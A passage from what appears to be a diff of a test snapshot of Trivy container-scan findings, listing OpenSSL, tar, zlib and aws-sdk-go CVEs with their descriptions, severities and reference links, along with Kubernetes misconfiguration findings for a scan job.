(alpine 3.18.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2023-2650", + "installedVersion": "3.1.0-r4", + "packageName": "libcrypto3", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-20193", - "https://bugzilla.redhat.com/show_bug.cgi?id=1917565", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20193", - "https://git.savannah.gnu.org/cgit/tar.git/commit/?id=d9d4435692150fa8ff68e1b1a473d187cc3fd777", - "https://nvd.nist.gov/vuln/detail/CVE-2021-20193", - "https://savannah.gnu.org/bugs/?59897", - "https://security.gentoo.org/glsa/202105-29", - "https://ubuntu.com/security/notices/USN-5329-1", - "https://www.cve.org/CVERecord?id=CVE-2021-20193", + "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "https://access.redhat.com/security/cve/CVE-2023-2650", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "https://ubuntu.com/security/notices/USN-6119-1", + "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230530.txt", ], }, "category": "Vulnerability", - "description": "A flaw was found in the src/list.c of tar 1.33 and earlier. This flaw allows an attacker who can submit a crafted input file to tar to cause uncontrolled consumption of memory. The highest threat from this vulnerability is to system availability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or +data containing them may be very slow. + +Impact summary: Applications that use OBJ_obj2txt() directly, or use any of +the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message +size limit may experience notable to very long delays when processing those +messages, which may lead to a Denial of Service. + +An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - +most of which have no size limit. OBJ_obj2txt() may be used to translate +an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL +type ASN1_OBJECT) to its canonical numeric text form, which are the +sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by +periods. + +When one of the sub-identifiers in the OBJECT IDENTIFIER is very large +(these are sizes that are seen as absurdly large, taking up tens or hundreds +of KiBs), the translation to a decimal number in text may take a very long +time. The time complexity is O(n^2) with 'n' being the size of the +sub-identifiers in bytes (*). + +With OpenSSL 3.0, support to fetch cryptographic algorithms using names / +identifiers in string form was introduced. This includes using OBJECT +IDENTIFIERs in canonical numeric text form as identifiers for fetching +algorithms. + +Such OBJECT IDENTIFIERs may be received through the ASN.1 structure +AlgorithmIdentifier, which is commonly used in multiple protocols to specify +what cryptographic algorithm should be used to sign or verify, encrypt or +decrypt, or digest passed data. + +Applications that call OBJ_obj2txt() directly with untrusted data are +affected, with any version of OpenSSL. If the use is for the mere purpose +of display, the severity is considered low. + +In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, +CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 +certificates, including simple things like verifying its signature. + +The impact on TLS is relatively low, because all versions of OpenSSL have a +100KiB limit on the peer's certificate chain. Additionally, this only +impacts clients, or servers that have explicitly enabled client +authentication. + +In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, +such as X.509 certificates. This is assumed to not happen in such a way +that it would cause a Denial of Service, so these versions are considered +not affected by this issue in such a way that it would be cause for concern, +and the severity is therefore considered low." +, + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", "mitigation": undefined, - "name": "tar: Memory leak in read_header() in list.c", + "name": "Possible DoS translating ASN.1 object identifiers", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-20193", + "value": "https://avd.aquasec.com/nvd/cve-2023-2650", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-20193", + "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1917565", + "value": "https://access.redhat.com/security/cve/CVE-2023-2650", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20193", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", }, { "type": "URL", - "value": "https://git.savannah.gnu.org/cgit/tar.git/commit/?id=d9d4435692150fa8ff68e1b1a473d187cc3fd777", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20193", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", }, { "type": "URL", - "value": "https://savannah.gnu.org/bugs/?59897", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202105-29", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5329-1", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-20193", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + }, + { + "type": "URL", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6119-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2023/dsa-5417", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230530.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-48303", - "installedVersion": "1.30+dfsg-6", - "packageName": "tar", + "fixedVersion": "3.1.1-r0", + "foundIn": "Target: 'docker.io/aquasec/trivy:0.42.0 (alpine 3.18.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2023-2650", + "installedVersion": "3.1.0-r4", + "packageName": "libssl3", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0959", - "https://access.redhat.com/security/cve/CVE-2022-48303", - "https://bugzilla.redhat.com/2149722", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", - "https://errata.almalinux.org/9/ALSA-2023-0959.html", - "https://errata.rockylinux.org/RLSA-2023:0959", - "https://linux.oracle.com/cve/CVE-2022-48303.html", - "https://linux.oracle.com/errata/ELSA-2023-0959.html", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", - "https://savannah.gnu.org/bugs/?62387", - "https://savannah.gnu.org/patch/?10307", - "https://ubuntu.com/security/notices/USN-5900-1", - "https://ubuntu.com/security/notices/USN-5900-2", - "https://www.cve.org/CVERecord?id=CVE-2022-48303", + "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "https://access.redhat.com/security/cve/CVE-2023-2650", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "https://ubuntu.com/security/notices/USN-6119-1", + "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230530.txt", ], }, "category": "Vulnerability", - "description": "GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or +data containing them may be very slow. + +Impact summary: Applications that use OBJ_obj2txt() directly, or use any of +the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message +size limit may experience notable to very long delays when processing those +messages, which may lead to a Denial of Service. + +An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - +most of which have no size limit. OBJ_obj2txt() may be used to translate +an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL +type ASN1_OBJECT) to its canonical numeric text form, which are the +sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by +periods. + +When one of the sub-identifiers in the OBJECT IDENTIFIER is very large +(these are sizes that are seen as absurdly large, taking up tens or hundreds +of KiBs), the translation to a decimal number in text may take a very long +time. The time complexity is O(n^2) with 'n' being the size of the +sub-identifiers in bytes (*). + +With OpenSSL 3.0, support to fetch cryptographic algorithms using names / +identifiers in string form was introduced. This includes using OBJECT +IDENTIFIERs in canonical numeric text form as identifiers for fetching +algorithms. + +Such OBJECT IDENTIFIERs may be received through the ASN.1 structure +AlgorithmIdentifier, which is commonly used in multiple protocols to specify +what cryptographic algorithm should be used to sign or verify, encrypt or +decrypt, or digest passed data. + +Applications that call OBJ_obj2txt() directly with untrusted data are +affected, with any version of OpenSSL. If the use is for the mere purpose +of display, the severity is considered low. + +In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, +CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 +certificates, including simple things like verifying its signature. + +The impact on TLS is relatively low, because all versions of OpenSSL have a +100KiB limit on the peer's certificate chain. Additionally, this only +impacts clients, or servers that have explicitly enabled client +authentication. + +In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, +such as X.509 certificates. This is assumed to not happen in such a way +that it would cause a Denial of Service, so these versions are considered +not affected by this issue in such a way that it would be cause for concern, +and the severity is therefore considered low." +, + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", "mitigation": undefined, - "name": "heap buffer overflow at from_header() in list.c via specially crafted checksum", + "name": "Possible DoS translating ASN.1 object identifiers", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-48303", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0959", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-48303", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2149722", + "value": "https://avd.aquasec.com/nvd/cve-2023-2650", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", + "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", + "value": "https://access.redhat.com/security/cve/CVE-2023-2650", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0959.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0959", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-48303.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0959.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", }, { "type": "URL", - "value": "https://savannah.gnu.org/bugs/?62387", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", }, { "type": "URL", - "value": "https://savannah.gnu.org/patch/?10307", + "value": "https://ubuntu.com/security/notices/USN-6119-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5900-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5900-2", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-48303", + "value": "https://www.openssl.org/news/secadv/20230530.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1:1.2.11.dfsg-1+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-37434", - "installedVersion": "1:1.2.11.dfsg-1", - "packageName": "zlib1g", + "fixedVersion": undefined, + "foundIn": "Target: 'usr/local/bin/trivy' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2020-8911", + "installedVersion": "v1.44.245", + "packageName": "github.com/aws/aws-sdk-go", "references": [ - "http://seclists.org/fulldisclosure/2022/Oct/37", - "http://seclists.org/fulldisclosure/2022/Oct/38", - "http://seclists.org/fulldisclosure/2022/Oct/41", - "http://seclists.org/fulldisclosure/2022/Oct/42", - "http://www.openwall.com/lists/oss-security/2022/08/05/2", - "http://www.openwall.com/lists/oss-security/2022/08/09/1", - "https://access.redhat.com/errata/RHSA-2022:8291", - "https://access.redhat.com/security/cve/CVE-2022-37434", - "https://bugzilla.redhat.com/2116639", - "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", - "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", - "https://errata.almalinux.org/9/ALSA-2022-8291.html", - "https://errata.rockylinux.org/RLSA-2022:8291", - "https://github.com/curl/curl/issues/9271", - "https://github.com/ivd38/zlib_overflow", - "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", - "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", - "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", - "https://linux.oracle.com/cve/CVE-2022-37434.html", - "https://linux.oracle.com/errata/ELSA-2023-1095.html", - "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", - "https://security.netapp.com/advisory/ntap-20220901-0005/", - "https://security.netapp.com/advisory/ntap-20230427-0007/", - "https://support.apple.com/kb/HT213488", - "https://support.apple.com/kb/HT213489", - "https://support.apple.com/kb/HT213490", - "https://support.apple.com/kb/HT213491", - "https://support.apple.com/kb/HT213493", - "https://support.apple.com/kb/HT213494", - "https://ubuntu.com/security/notices/USN-5570-1", - "https://ubuntu.com/security/notices/USN-5570-2", - "https://ubuntu.com/security/notices/USN-5573-1", - "https://www.cve.org/CVERecord?id=CVE-2022-37434", - "https://www.debian.org/security/2022/dsa-5218", + "https://access.redhat.com/security/cve/CVE-2020-8911", + "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", + "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", + "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "https://github.com/aws/aws-sdk-go/pull/3403", + "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", + "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", + "https://pkg.go.dev/vuln/GO-2022-0646", + "https://www.cve.org/CVERecord?id=CVE-2020-8911", ], }, "category": "Vulnerability", - "description": "zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A padding oracle vulnerability exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. The SDK allows users to encrypt files with AES-CBC without computing a Message Authentication Code (MAC), which then allows an attacker who has write access to the target's S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file, they can reconstruct the plaintext with (on average) 128*length (plaintext) queries to the endpoint, by exploiting CBC's ability to manipulate the bytes of the next block and PKCS5 padding errors. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", "mitigation": undefined, - "name": "heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field", + "name": "aws/aws-sdk-go: CBC padding oracle issue in AWS S3 Crypto SDK for golang", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-37434", + "value": "https://avd.aquasec.com/nvd/cve-2020-8911", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/37", + "value": "https://access.redhat.com/security/cve/CVE-2020-8911", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/38", + "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/41", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/42", + "value": "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/08/05/2", + "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/08/09/1", + "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8291", + "value": "https://github.com/aws/aws-sdk-go/pull/3403", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-37434", + "value": "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2116639", + "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", + "value": "https://pkg.go.dev/vuln/GO-2022-0646", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-8911", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'usr/local/bin/trivy' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2020-8912", + "installedVersion": "v1.44.245", + "packageName": "github.com/aws/aws-sdk-go", + "references": [ + "https://access.redhat.com/security/cve/CVE-2020-8912", + "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", + "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", + "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "https://github.com/aws/aws-sdk-go/pull/3403", + "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", + "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", + "https://pkg.go.dev/vuln/GO-2022-0646", + "https://www.cve.org/CVERecord?id=CVE-2020-8912", + ], + }, + "category": "Vulnerability", + "description": "A vulnerability in the in-band key negotiation exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. An attacker with write access to the targeted bucket can change the encryption algorithm of an object in the bucket, which can then allow them to change AES-GCM to AES-CTR. Using this in combination with a decryption oracle can reveal the authentication key used by AES-GCM as decrypting the GMAC tag leaves the authentication key recoverable as an algebraic equation. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": undefined, + "name": "aws-sdk-go: In-band key negotiation issue in AWS S3 Crypto SDK for golang", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", + "value": "https://avd.aquasec.com/nvd/cve-2020-8912", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", + "value": "https://access.redhat.com/security/cve/CVE-2020-8912", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8291.html", + "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8291", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", }, { "type": "URL", - "value": "https://github.com/curl/curl/issues/9271", + "value": "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", }, { "type": "URL", - "value": "https://github.com/ivd38/zlib_overflow", + "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", }, { "type": "URL", - "value": "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", + "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", }, { "type": "URL", - "value": "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", + "value": "https://github.com/aws/aws-sdk-go/pull/3403", }, { "type": "URL", - "value": "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", + "value": "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-37434.html", + "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-1095.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", + "value": "https://pkg.go.dev/vuln/GO-2022-0646", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-8912", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'resources.limits.cpu')", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": 